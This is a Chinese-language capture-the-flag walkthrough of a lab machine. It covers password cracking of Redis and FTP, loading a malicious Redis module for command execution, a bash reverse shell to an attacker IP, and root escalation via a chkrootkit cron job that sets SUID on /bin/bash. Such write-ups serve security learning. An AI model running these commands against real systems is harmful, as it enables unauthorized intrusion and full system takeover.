# 靶场搭建
下载:System
Nat,IP: 192.168.1.148
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
2121/tcp open ftp pyftpdlib 1.5.6 | |
| ftp-syst: | |
| STAT: | |
| FTP server status: | |
| Connected to: 192.168.1.148:2121 | |
| Waiting for username. | |
| TYPE: ASCII; STRUcture: File; MODE: Stream | |
| Data connection closed. | |
|_End of status. | |
6379/tcp open redis Redis key-value store | |
8000/tcp open http SimpleHTTPServer 0.6 (Python 3.9.2) | |
|_http-server-header: SimpleHTTP/0.6 Python/3.9.2 | |
|_http-title: Site doesn't have a title (text/html). |
使用 metasploit 中的 redis_login 模块,用 rockyou 字典拿到密码 bonjour
但是 redis 没什么用,没什么权限
用获得密码枚举 ftp
┌──(root㉿kali)-[~] | |
└─# hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 'bonjour' 192.168.1.148 ftp -s 2121 -t 64 -I | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 02:09:21 | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10177 login tries (l:10177/p:1), ~160 tries per task | |
[DATA] attacking ftp://192.168.1.148:2121/ | |
[2121][ftp] host: 192.168.1.148 login: ben password: bonjour | |
[STATUS] 1153.00 tries/min, 1153 tries in 00:01h, 9024 to do in 00:08h, 64 active |
得到一组账号密码: ben/bonjour
ftp 登录上去,没有任何收集到的信息
传文件上去也没有利用的方法,web 服务时 python 的,难绷。。。
# Load Redis Module
上传 so 的模块,到入至 redis。
项目:RedisModules-ExecuteCommand
编译好后上传到 ftp
192.168.1.148:6379> MODULE LOAD /srv/ftp/module.so | |
OK | |
192.168.1.148:6379> system.exec "id" | |
"uid=1000(ben) gid=1000(ben) grupos=1000(ben)\n" | |
192.168.1.148:6379> system.exec "bash -c 'bash -i >& /dev/tcp/192.168.1.129/4444 0>&1'" |
拿到了 shell
# 提权
上传 pspy 发现有 chkrootkit 的计划任务
在 /tmp/update 写入反弹 shell
#!/bin/bash | |
chmod +s /bin/bash |
等待后, /bin/bash -p 拿到了 root 权限
